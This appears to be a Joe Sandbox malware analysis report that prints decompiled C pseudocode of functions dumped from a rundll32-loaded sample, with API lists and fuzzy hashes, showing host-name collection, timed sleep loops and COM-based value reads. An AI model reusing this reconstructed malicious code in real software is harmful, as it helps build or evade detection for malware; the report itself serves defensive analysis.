                    C-Code - Quality: 78%
                    			E044457A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                    				intOrPtr _v8;
                    				void* _v12;
                    				void* _v16;
                    				intOrPtr _t26;
                    				intOrPtr* _t28;
                    				intOrPtr _t31;
                    				intOrPtr* _t32;
                    				void* _t39;
                    				int _t46;
                    				intOrPtr* _t47;
                    				int _t48;
                    
                    				_t47 = __eax;
                    				_push( &_v12);
                    				_push(__eax);
                    				_t39 = 0;
                    				_t46 = 0; // executed
                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                    				_v8 = _t26;
                    				if(_t26 < 0) {
                    					L13:
                    					return _v8;
                    				}
                    				if(_v12 == 0) {
                    					Sleep(0xc8);
                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                    				}
                    				if(_v8 >= _t39) {
                    					_t28 = _v12;
                    					if(_t28 != 0) {
                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                    						_v8 = _t31;
                    						if(_t31 >= 0) {
                    							_t46 = lstrlenW(_v16);
                    							if(_t46 != 0) {
                    								_t46 = _t46 + 1;
                    								_t48 = _t46 + _t46;
                    								_t39 = E044463FD(_t48);
                    								if(_t39 == 0) {
                    									_v8 = 0x8007000e;
                    								} else {
                    									memcpy(_t39, _v16, _t48);
                    								}
                    								__imp__#6(_v16);
                    							}
                    						}
                    						_t32 = _v12;
                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                    					}
                    					 *_a4 = _t39;
                    					 *_a8 = _t46 + _t46;
                    				}
                    				goto L13;
                    			}















                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: 4a60ab949339256b1a72650e3ab13f27cbd5c8f6bd70305c7f70ddcb25c0fed6
                    • Instruction ID: eb089adb904146b09022a541a8d5eaabc76f01114cbeb4ba692d4eaf35ddaacb
                    • Opcode Fuzzy Hash: 4a60ab949339256b1a72650e3ab13f27cbd5c8f6bd70305c7f70ddcb25c0fed6
                    • Instruction Fuzzy Hash: 1D215E75A00609FFEF11DFA4C88499EBBB8FF89310B1045AEE915D7200EB30AA11CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E04442A4C(void* __ecx, intOrPtr _a4) {
                    				struct _FILETIME _v12;
                    				int _t13;
                    				signed int _t16;
                    				void* _t18;
                    				signed int _t19;
                    				unsigned int _t23;
                    				void* _t30;
                    				signed int _t34;
                    
                    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                    				asm("stosd");
                    				do {
                    					_t13 = SwitchToThread();
                    					GetSystemTimeAsFileTime( &_v12);
                    					_t23 = _v12.dwHighDateTime;
                    					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                    					_push(0);
                    					_push(0x13);
                    					_push(_t23 >> 5);
                    					_push(_t16);
                    					L044482E6();
                    					_t34 = _t16 + _t13;
                    					_t18 = E04442888(_a4, _t34);
                    					_t30 = _t18;
                    					_t19 = 3;
                    					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                    				} while (_t30 == 1);
                    				return _t30;
                    			}












                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,04444610,?,?), ref: 04442A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04444610,?,?), ref: 04442A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04442A82
                      • Part of subcall function 04442888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 044428E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04444610,?,?), ref: 04442AA1
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: 17c2a6d608c4322669791a8f2fbfd13324669c93c96cad92fd0cefd5c2919c72
                    • Instruction ID: 798cf5418393bc0f7a73e4fb5b374da2f1ba4c604ee098caaefb341fcc6cfd17
                    • Opcode Fuzzy Hash: 17c2a6d608c4322669791a8f2fbfd13324669c93c96cad92fd0cefd5c2919c72
                    • Instruction Fuzzy Hash: 2EF0A4B7A40508BBEB149BA5CC19B9FB6A8EBC4355F100165F601E7240E5B8AE00C664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04445231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                    				struct _FILETIME _v12;
                    				void* _t11;
                    				void* _t15;
                    				void* _t20;
                    				void* _t22;
                    				void* _t23;
                    				signed short* _t24;
                    
                    				_t22 = __edx;
                    				_t23 = E04445406(_t11, _a12);
                    				if(_t23 == 0) {
                    					_t20 = 8;
                    				} else {
                    					_t24 = _t23 + _a16 * 2;
                    					 *_t24 =  *_t24 & 0x00000000; // executed
                    					_t15 = E044415E6(__ecx, _a4, _a8, _t23); // executed
                    					_t20 = _t15;
                    					if(_t20 == 0) {
                    						GetSystemTimeAsFileTime( &_v12);
                    						 *_t24 = 0x5f;
                    						_t20 = E04445B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                    					}
                    					HeapFree( *0x444a2d8, 0, _t23);
                    				}
                    				return _t20;
                    			}











                    APIs
                      • Part of subcall function 04445406: lstrlen.KERNEL32(?,00000000,04F49D58,00000000,04443C77,04F49F7B,69B25F44,?,?,?,?,69B25F44,00000005,0444A00C,4D283A53,?), ref: 0444540D
                      • Part of subcall function 04445406: mbstowcs.NTDLL ref: 04445436
                      • Part of subcall function 04445406: memset.NTDLL ref: 04445448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04F493CC), ref: 04445268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04F493CC), ref: 04445295
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: 116e07ad0dfadd62f25cdfa4633391ad4d7a1425addf8d5d7d1cb2b2e270216a
                    • Instruction ID: 878fd62d158f71a373c5592058e74c339a26990df44a47be661e821e090c4675
                    • Opcode Fuzzy Hash: 116e07ad0dfadd62f25cdfa4633391ad4d7a1425addf8d5d7d1cb2b2e270216a
                    • Instruction Fuzzy Hash: 2D01A232200209BBFF215F95DC44F9BBB78FBC4704F00402AFA00AA151E771E855DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 47%
                    			E04443B61(char* _a4, char** _a8) {
                    				char* _t7;
                    				char* _t11;
                    				char* _t14;
                    				char* _t16;
                    				char* _t17;
                    				char _t18;
                    				signed int _t20;
                    				signed int _t22;
                    
                    				_t16 = _a4;
                    				_push(0x20);
                    				_t20 = 1;
                    				_push(_t16);
                    				while(1) {
                    					_t7 = StrChrA();
                    					if(_t7 == 0) {
                    						break;
                    					}
                    					_t20 = _t20 + 1;
                    					_push(0x20);
                    					_push( &(_t7[1]));
                    				}
                    				_t11 = E044463FD(_t20 << 2);
                    				_a4 = _t11;
                    				if(_t11 != 0) {
                    					StrTrimA(_t16, 0x4449284); // executed
                    					_t22 = 0;
                    					do {
                    						_t14 = StrChrA(_t16, 0x20);
                    						if(_t14 != 0) {
                    							 *_t14 = 0;
                    							do {
                    								_t14 =  &(_t14[1]);
                    								_t18 =  *_t14;
                    							} while (_t18 == 0x20 || _t18 == 9);
                    						}
                    						_t17 = _a4;
                    						 *(_t17 + _t22 * 4) = _t16;
                    						_t22 = _t22 + 1;
                    						_t16 = _t14;
                    					} while (_t14 != 0);
                    					 *_a8 = _t17;
                    				}
                    				return 0;
                    			}












                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,04F495AC,?,?,0444104B,?,04F495AC), ref: 04443B7D
                    • StrTrimA.SHLWAPI(?,04449284,00000002,?,0444104B,?,04F495AC), ref: 04443B9B
                    • StrChrA.SHLWAPI(?,00000020,?,0444104B,?,04F495AC), ref: 04443BA6
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: 43acc515dcde6b4184c3fc63d8bea2c36c829128a3ccc2b8199bc177925fdd0c
                    • Instruction ID: 321bd72f340e885b522153a6228380095d46bbcf8b0bc281303d41bdb5c8327f
                    • Opcode Fuzzy Hash: 43acc515dcde6b4184c3fc63d8bea2c36c829128a3ccc2b8199bc177925fdd0c
                    • Instruction Fuzzy Hash: AF01B1713003856FFB209E2A8C44F577B8DEBC9B94F000013AE45CB283D630E8028660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0444607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                    				int _v12;
                    				signed int _v16;
                    				void* _v20;
                    				signed char _v36;
                    				void* _t24;
                    				intOrPtr _t27;
                    				void* _t35;
                    				signed char* _t46;
                    				int _t53;
                    				void* _t55;
                    				void* _t56;
                    				void* _t57;
                    
                    				_v16 = _v16 & 0x00000000;
                    				_t46 = _a4;
                    				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                    				_v12 = 0x110;
                    				_t24 = E044463FD(_t53);
                    				_a4 = _t24;
                    				if(_t24 != 0) {
                    					memcpy(_t24,  *0x444a374, 0x110);
                    					_t27 =  *0x444a378; // 0x0
                    					_t57 = _t56 + 0xc;
                    					if(_t27 != 0) {
                    						_t51 = _a4;
                    						E044443A6(0x110, _a4, _t27, 0);
                    					}
                    					if(E04445B65( &_v36) != 0) {
                    						_t35 = E04444872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                    						if(_t35 == 0) {
                    							_t55 = _v20;
                    							_v36 =  *_t46;
                    							_v16 = E04446412(_t55, _a8, _t51, _t46, _a12);
                    							 *(_t55 + 4) = _v36;
                    							_t20 =  &(_t46[4]); // 0xbf0845c7
                    							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                    							_t57 = _t57 + 0xc;
                    							E044417AB(_t55);
                    						}
                    					}
                    					memset(_a4, 0, _t53);
                    					E044417AB(_a4);
                    				}
                    				return _v16;
                    			}
















                    APIs
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,04444DD9,?,04443AC6,04443AC6,?), ref: 044460B3
                    • memset.NTDLL ref: 04446128
                    • memset.NTDLL ref: 0444613C
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: 5d2bb94f622dc7e1a98177b5ef74964eda7e3fb175b21a0b11b68cb7b7693172
                    • Instruction ID: 44e5de6d63494e9c08ea03fb335dc5337186c56aa1c7925f5f0f05b6f1aca177
                    • Opcode Fuzzy Hash: 5d2bb94f622dc7e1a98177b5ef74964eda7e3fb175b21a0b11b68cb7b7693172
                    • Instruction Fuzzy Hash: 7E212475A00118ABFF11EF66CC45FDE7BB8AF85644F04405AF905E7242D734E6418BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E04445F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                    				void* _v8;
                    				void* __esi;
                    				intOrPtr* _t35;
                    				void* _t40;
                    				intOrPtr* _t41;
                    				intOrPtr* _t43;
                    				intOrPtr* _t45;
                    				intOrPtr* _t50;
                    				intOrPtr* _t52;
                    				void* _t54;
                    				intOrPtr* _t55;
                    				intOrPtr* _t57;
                    				intOrPtr* _t61;
                    				intOrPtr* _t65;
                    				intOrPtr _t68;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    
                    				_t55 = _a4;
                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                    				_a4 = 0;
                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                    				if(_t76 < 0) {
                    					L18:
                    					return _t76;
                    				}
                    				_t40 = E044414E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                    				_t76 = _t40;
                    				if(_t76 >= 0) {
                    					_t61 = _a28;
                    					if(_t61 != 0 &&  *_t61 != 0) {
                    						_t52 = _v8;
                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                    					}
                    					if(_t76 >= 0) {
                    						_t43 =  *_t55;
                    						_t68 =  *0x444a320; // 0xafd5a8
                    						_t20 = _t68 + 0x444b1fc; // 0x740053
                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                    						if(_t76 >= 0) {
                    							_t76 = E044463B0(_a4);
                    							if(_t76 >= 0) {
                    								_t65 = _a28;
                    								if(_t65 != 0 &&  *_t65 == 0) {
                    									_t50 = _a4;
                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                    								}
                    							}
                    						}
                    						_t45 = _a4;
                    						if(_t45 != 0) {
                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                    						}
                    						_t57 = __imp__#6;
                    						if(_a20 != 0) {
                    							 *_t57(_a20);
                    						}
                    						if(_a12 != 0) {
                    							 *_t57(_a12);
                    						}
                    					}
                    				}
                    				_t41 = _v8;
                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                    				goto L18;
                    			}






















                    APIs
                      • Part of subcall function 044414E4: SysAllocString.OLEAUT32(80000002), ref: 0444153B
                      • Part of subcall function 044414E4: SysFreeString.OLEAUT32(00000000), ref: 044415A0
                    • SysFreeString.OLEAUT32(?), ref: 0444605F
                    • SysFreeString.OLEAUT32(04442BCC), ref: 04446069
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 1a3dfb1304fa69b82b05f56b4e1c6e4630f6ff86664b53a8dcceab8aa05421da
                    • Instruction ID: 74d58a3718afe199c2cb70bdd4921491ff66452e4bf8944a0d1bebb5fc6ff845
                    • Opcode Fuzzy Hash: 1a3dfb1304fa69b82b05f56b4e1c6e4630f6ff86664b53a8dcceab8aa05421da
                    • Instruction Fuzzy Hash: B631A772500208EFDF20DF69C888C9BBB79FBCA7407114649F9059B211D336EC91CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04442985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                    				void* _t24;
                    				signed short _t25;
                    				signed int _t27;
                    				intOrPtr* _t28;
                    				signed short _t29;
                    
                    				_t28 = __edi;
                    				if(_a4 == 0) {
                    					L2:
                    					_t29 = E04441BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                    					if(_t29 == 0) {
                    						_t27 = _a12 >> 1;
                    						if(_t27 == 0) {
                    							_t29 = 2;
                    							HeapFree( *0x444a2d8, 0, _a4);
                    						} else {
                    							_t24 = _a4;
                    							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                    							 *_t28 = _t24;
                    						}
                    					}
                    					L6:
                    					return _t29;
                    				}
                    				_t25 = E04443CEA(_a4, _a8, _a12, __edi); // executed
                    				_t29 = _t25;
                    				if(_t29 == 0) {
                    					goto L6;
                    				}
                    				goto L2;
                    			}









                    APIs
                      • Part of subcall function 04443CEA: SysFreeString.OLEAUT32(00000000), ref: 04443D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,044433D6,?,004F0053,04F493D8,00000000,?), ref: 044429E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    • Opcode ID: 0de32814741d99889475dae66f8e09eb2d82274ab5b7215eb777b25210ffe819
                    • Instruction ID: b74f8d5d5858c74eac0c5bd59d5468f981a01c58f38987d944d40e26b85f2a1a
                    • Opcode Fuzzy Hash: 0de32814741d99889475dae66f8e09eb2d82274ab5b7215eb777b25210ffe819
                    • Instruction Fuzzy Hash: 7B014B32200259BBEF229F84DC01FEB7B69FF84790F04801AFE045A261D771E960EB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0444256F(void* __ecx) {
                    				signed int _v8;
                    				void* _t15;
                    				void* _t19;
                    				void* _t20;
                    				void* _t22;
                    				intOrPtr* _t23;
                    
                    				_t23 = __imp__;
                    				_t20 = 0;
                    				_v8 = _v8 & 0;
                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                    				_t10 = _v8;
                    				if(_v8 != 0) {
                    					_t20 = E044463FD(_t10 + 1);
                    					if(_t20 != 0) {
                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                    						if(_t15 != 0) {
                    							 *((char*)(_v8 + _t20)) = 0;
                    						} else {
                    							E044417AB(_t20);
                    							_t20 = 0;
                    						}
                    					}
                    				}
                    				return _t20;
                    			}










                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04446999), ref: 04442587
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04446999), ref: 044425A4
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    • Opcode ID: 1278630133b9d3213f542952b020870b99d1a3995cc495fa55bad15737b685d0
                    • Instruction ID: 51fe7186f4b25078498cb033d11c77c44cb7495100b4f861231d4f64e1227917
                    • Opcode Fuzzy Hash: 1278630133b9d3213f542952b020870b99d1a3995cc495fa55bad15737b685d0
                    • Instruction Fuzzy Hash: 5FF05B76600145FAFF11D69A8C14F9F7ABCDBC5654F11009BF904D3241E9B0EF029670
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E044445D2(signed int __edx, intOrPtr _a4) {
                    				void* _t3;
                    				void* _t5;
                    				void* _t8;
                    				void* _t9;
                    				void* _t10;
                    				signed int _t11;
                    
                    				_t11 = __edx;
                    				_t3 = HeapCreate(0, 0x400000, 0); // executed
                    				 *0x444a2d8 = _t3;
                    				if(_t3 == 0) {
                    					_t9 = 8;
                    					return _t9;
                    				}
                    				 *0x444a1c8 = GetTickCount();
                    				_t5 = E04445A5A(_a4);
                    				if(_t5 == 0) {
                    					E04442A4C(_t10, _a4); // executed
                    					if(E04444C43(_t10) != 0) {
                    						 *0x444a300 = 1; // executed
                    					}
                    					_t8 = E04446535(_t11); // executed
                    					return _t8;
                    				}
                    				return _t5;
                    			}










                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,0444108E,?), ref: 044445DB
                    • GetTickCount.KERNEL32 ref: 044445EF
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    • Opcode ID: 047b34b538ff58c20558b4b536e80360e49f5feacad2af432ca5f26cdcf660c4
                    • Instruction ID: 83386f0d0a57180aa8ff8064613360ab3e246335727c87ffa1e81e80ec58a4e5
                    • Opcode Fuzzy Hash: 047b34b538ff58c20558b4b536e80360e49f5feacad2af432ca5f26cdcf660c4
                    • Instruction Fuzzy Hash: 3FE06D74684200ABFF606F71AD0670A75A4BBC070AF10411AE508E1195EBB9A840AA21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 34%
                    			E04443CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				intOrPtr _v12;
                    				void* _v18;
                    				short _v20;
                    				intOrPtr _t15;
                    				short _t17;
                    				intOrPtr _t19;
                    				short _t23;
                    
                    				_t23 = 0;
                    				_v20 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				_t15 =  *0x444a320; // 0xafd5a8
                    				_t4 = _t15 + 0x444b39c; // 0x4f48944
                    				_t20 = _t4;
                    				_t6 = _t15 + 0x444b124; // 0x650047
                    				_t17 = E04445F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                    				if(_t17 < 0) {
                    					_t23 = _t17;
                    				} else {
                    					if(_v20 != 8) {
                    						_t23 = 1;
                    					} else {
                    						_t19 = E04442E8A(_t20, _v12);
                    						if(_t19 == 0) {
                    							_t23 = 8;
                    						} else {
                    							 *_a16 = _t19;
                    						}
                    						__imp__#6(_v12);
                    					}
                    				}
                    				return _t23;
                    			}











                    APIs
                      • Part of subcall function 04445F80: SysFreeString.OLEAUT32(?), ref: 0444605F
                      • Part of subcall function 04442E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,044425F5,004F0053,00000000,?), ref: 04442E93
                      • Part of subcall function 04442E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,044425F5,004F0053,00000000,?), ref: 04442EBD
                      • Part of subcall function 04442E8A: memset.NTDLL ref: 04442ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 04443D50
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    • Opcode ID: f50fff2c1814c39dca417150f91c0176230a811268131928a2ece27bdd3caa28
                    • Instruction ID: e51af1db723117dce4881e982db5d18d9f7a51cc079962ef3bbb15251ad12ceb
                    • Opcode Fuzzy Hash: f50fff2c1814c39dca417150f91c0176230a811268131928a2ece27bdd3caa28
                    • Instruction Fuzzy Hash: AD017172600029FFEF119FA8CC04DAEBBB9FB84B54F404466EA05E7161E3B0B915DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E044456CF(intOrPtr* __edi) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				intOrPtr _t15;
                    				intOrPtr* _t21;
                    
                    				_t21 = __edi;
                    				_push( &_v12);
                    				_push(__edi);
                    				_v8 = 0x1d4c0;
                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                    				while(1) {
                    					_v16 = _t15;
                    					Sleep(0x1f4); // executed
                    					if(_v12 == 4) {
                    						break;
                    					}
                    					if(_v8 == 0) {
                    						L4:
                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                    						continue;
                    					} else {
                    						if(_v8 <= 0x1f4) {
                    							_v16 = 0x80004004;
                    						} else {
                    							_v8 = _v8 - 0x1f4;
                    							goto L4;
                    						}
                    					}
                    					L8:
                    					return _v16;
                    				}
                    				goto L8;
                    			}









                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: c74177b28b81dc9737013a895ad6f7c4b057f6b6cb2e4fe5445a20d2aded8cf7
                    • Instruction ID: 7d40c99089ddce987665807e70d1f3cf435f771e4e322a1091967abfc3fec4bd
                    • Opcode Fuzzy Hash: c74177b28b81dc9737013a895ad6f7c4b057f6b6cb2e4fe5445a20d2aded8cf7
                    • Instruction Fuzzy Hash: 0AF0C975D01218FFEF10DBD4D488AEEB7B8FF45645F1080ABE60667240D3746A84DB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E04447885(void* __ecx, void* __edx, void* _a4, void* _a8) {
                    				void* _t13;
                    				void* _t21;
